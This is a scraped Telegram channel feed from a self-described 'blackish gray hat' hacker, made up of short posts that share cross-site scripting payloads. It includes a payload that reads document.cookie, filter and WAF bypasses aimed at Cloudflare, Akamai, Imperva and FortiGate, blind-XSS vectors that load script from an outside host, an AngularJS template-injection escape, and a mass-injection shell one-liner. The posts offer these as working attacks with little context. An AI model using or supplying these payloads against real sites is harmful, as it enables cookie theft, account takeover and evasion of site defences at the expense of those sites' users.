Eʀᴏ ··ʜᴀᴄᴋ··
@EroHack0
4.94K subscribers
65 photos
27 videos
10 files
104 links
🗡 A blackish gray hat hacker 🗡

🎯 Bug Bounty | Ethical Hacking | Web Exploits
📚 Tips, Writeups, Tools & Real Reports

Admin: @GoRunEro
加入频道
About
Blog
Apps
Platform
Join
Eʀᴏ ··ʜᴀᴄᴋ··
4.94K subscribers
Eʀᴏ ··ʜᴀᴄᴋ··
This payload can be used for Client Side Template injection and Reflected XSS, perhaps a code injection can be triggered in the background

Payload :

'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o

#Payload #xss
——————‌
@EroHack0
👉 Boost
👍183🔥2🗿1
1.12K views
Eʀᴏ ··ʜᴀᴄᴋ··
Nice collection of XSS filters bypasses 💎

Github

#Bypass #xss
——————‌
@EroHack | Boost
GitHub
GitHub - Edr4/XSS-Bypass-Filters
Contribute to Edr4/XSS-Bypass-Filters development by creating an account on GitHub.
🔥178138👍1376
2.6K viewsedited  
Eʀᴏ ··ʜᴀᴄᴋ··
🤖Here's another Blind XSS vector!

1"/import(src)'<Script/Src=//X55.is?1=00><Img/OnLoad='


🫦Where 00 is your unique KNOXSS id.
➡️If it fails with <Script it might pop with <Img in a multi reflection scenario!

#XSS

🔈 @EroHack
Boost
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥932
1.51K views
Eʀᴏ ··ʜᴀᴄᴋ··
Payload:
"%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

#XSS

🌐@EroHack
Boost
Please open Telegram to view this post
VIEW IN TELEGRAM
933👍1
1.42K views
Eʀᴏ ··ʜᴀᴄᴋ··
👺xss oneliner command

echo "testphp.vulnweb.com" | waybackurls | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|icon|pdf|svg|txt|js)" | urldedupe -s | grep -IE "[?].*[&]?" | grep "=" | unew -p | pvreplace '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' | xsschecker -match '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' -vuln


⬇️ Download ( Tools )
🔒 BugCod3 ( ZIP )

#XSS #BugBounty

🌐@EroHack
➡️Boost
Please open Telegram to view this post
VIEW IN TELEGRAM
8👍3
1.8K views
Eʀᴏ ··ʜᴀᴄᴋ··
☠️Parameter: invitedby=

Payload=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


Full_url= https://site. com/?invitedby=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


#XSS #BugBounty

❤️@EroHack
✔️Boost
Please open Telegram to view this post
VIEW IN TELEGRAM
7🤯4
1.72K views
Eʀᴏ ··ʜᴀᴄᴋ··
Nice collection of XSS filters bypasses 💎

Github

#Bypass #xss
——————‌
@EroHack | Boost
GitHub
GitHub - Edr4/XSS-Bypass-Filters
Contribute to Edr4/XSS-Bypass-Filters development by creating an account on GitHub.
👍5🔥2👎1🤯1
2.33K views
Eʀᴏ ··ʜᴀᴄᴋ··
🟫 WAF Fortinet FortiGate XSS Bypass

🖥Payload
<details open ontoggle="(()=>alertibrahimxss)()"></details>

#XSS #WAF #Payload
🔹🔺🔹🔺🔹🔺🔹🔺🔹
Erohack
💧Boost
🐦Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
5👍3🔥1
3.72K views
Eʀᴏ ··ʜᴀᴄᴋ··
🙂One XSS Payload for bypass ( Akamai, imperva, cloudflare & Waf ) 🚪

HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>


#Xss #Payload #Waf

🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥62🤯1
3.11K views
Eʀᴏ ··ʜᴀᴄᴋ··
⚠️XSS Bypass Akamai, Imperva and CloudFlare

☠️Payload
<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>


#XSS #Payload
🔹🔺🔹🔺🔹🔺🔹🔺🔹
Erohack
💧Boost
🐦Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
💯5🔥2🫡1🗿1
3.14K viewsedited  
Eʀᴏ ··ʜᴀᴄᴋ··
😀XSS in Office.com. The + made a difference.

Payload:‍‍‍
`'>+<script>alert()</script>`

#BugBounty #Tips #XSS

🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8💯2🎃1
3.9K views
Eʀᴏ ··ʜᴀᴄᴋ··
🔥CLOUDFLARE BYPASS (Xss)

🖥PAYLOAD:
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>


#Bypass #Xss #cloudflare
✍️✍️✍️✍️✍️✍️✍️✍️✍️✍️
🔝EroHack
💜Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5👍2💯2🫡1
4.69K views
Eʀᴏ ··ʜᴀᴄᴋ··
⚠️AngularJS Client-Side Template Injection as XSS payload for 1.2.24-1.2.29

{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}


#Xss #Payload

EroHack
🗯Boost
📣Twitter
🔥51👍1💯1🤨1
4.73K views